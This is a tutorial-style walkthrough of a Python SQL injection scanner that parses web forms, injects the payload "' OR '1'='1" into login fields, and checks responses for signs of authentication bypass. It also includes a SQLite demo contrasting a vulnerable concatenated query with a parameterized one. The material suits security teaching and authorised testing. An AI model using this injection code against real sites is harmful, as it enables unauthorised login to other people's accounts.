SQL Injection scanner
Automates detection of SQL injection vulnerabilities by parsing web forms, injecting payloads, and analyzing HTTP responses for error signatures or bypass indicators.
Form Discovery
Uses BeautifulSoup to locate forms on the page:
import requests
from bs4 import BeautifulSoup
s = requests.Session()
resp = s.get(url)
soup = BeautifulSoup(resp.content, "html.parser")
forms = soup.find_all("form")
Returns each <form> element for further analysis.
Payload Construction
Extracts form details, then builds a data dictionary injecting "' OR '1'='1" into input fields named user, username or password:
data = {}
for field in details['inputs']:
    if field['name'].lower() in ('user', 'username', 'password'):
        data[field['name']] = "' OR '1'='1"
    elif field['type'] == 'hidden' or field['value']:
        data[field['name']] = field['value']
    else:
        data[field['name']] = 'testing'
Preserves hidden fields and assigns dummy values to others.
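To show why this payload bypasses a login check and how the query should be written instead, here is an added example (not part of the scanner) that runs the same "' OR '1'='1" input against a string-built query and against a parameterized one, using an in-memory SQLite database with a constructed users table:

```python
import sqlite3

# The payload the scanner injects into user/username/password fields.
PAYLOAD = "' OR '1'='1"


def make_db() -> sqlite3.Connection:
    # Constructed sample data: one account in an in-memory database.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (username TEXT, password TEXT)")
    conn.execute("INSERT INTO users VALUES ('alice', 's3cret')")
    return conn


def login_vulnerable(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Query text is built by concatenation, so the quote in the payload closes
    # the string literal and OR '1'='1' becomes part of the WHERE clause.
    sql = (
        "SELECT COUNT(*) FROM users WHERE username = '"
        + username
        + "' AND password = '"
        + password
        + "'"
    )
    return conn.execute(sql).fetchone()[0] > 0


def login_safe(conn: sqlite3.Connection, username: str, password: str) -> bool:
    # Parameter binding passes the payload as data; it is compared as a plain
    # string value and cannot change the structure of the query.
    sql = "SELECT COUNT(*) FROM users WHERE username = ? AND password = ?"
    return conn.execute(sql, (username, password)).fetchone()[0] > 0


def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable_bypassed": login_vulnerable(conn, PAYLOAD, PAYLOAD),
        "safe_bypassed": login_safe(conn, PAYLOAD, PAYLOAD),
        "valid_credentials": login_safe(conn, "alice", "s3cret"),
    }


if __name__ == "__main__":
    for name, result in demo().items():
        print(f"{name}: {result}")
```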
Attack Execution & Analysis
Sends the crafted payload via GET or POST and inspects the response body:
if method == 'post':
    resp = s.post(action_url, data=data)
else:
    resp = s.get(action_url, params=data)

body = resp.text.lower()
if 'sign off' in body:
    print("Authentication bypass detected")
else:
    print("No bypass detected")
Flags a successful bypass when the response contains known post-login markers (e.g., "Sign Off").
Key Takeaways
- Dynamic form parsing with BeautifulSoup for versatile input handling.
- Automated payload injection covering GET/POST scenarios.
- Response analysis using string matching for reliable vulnerability detection.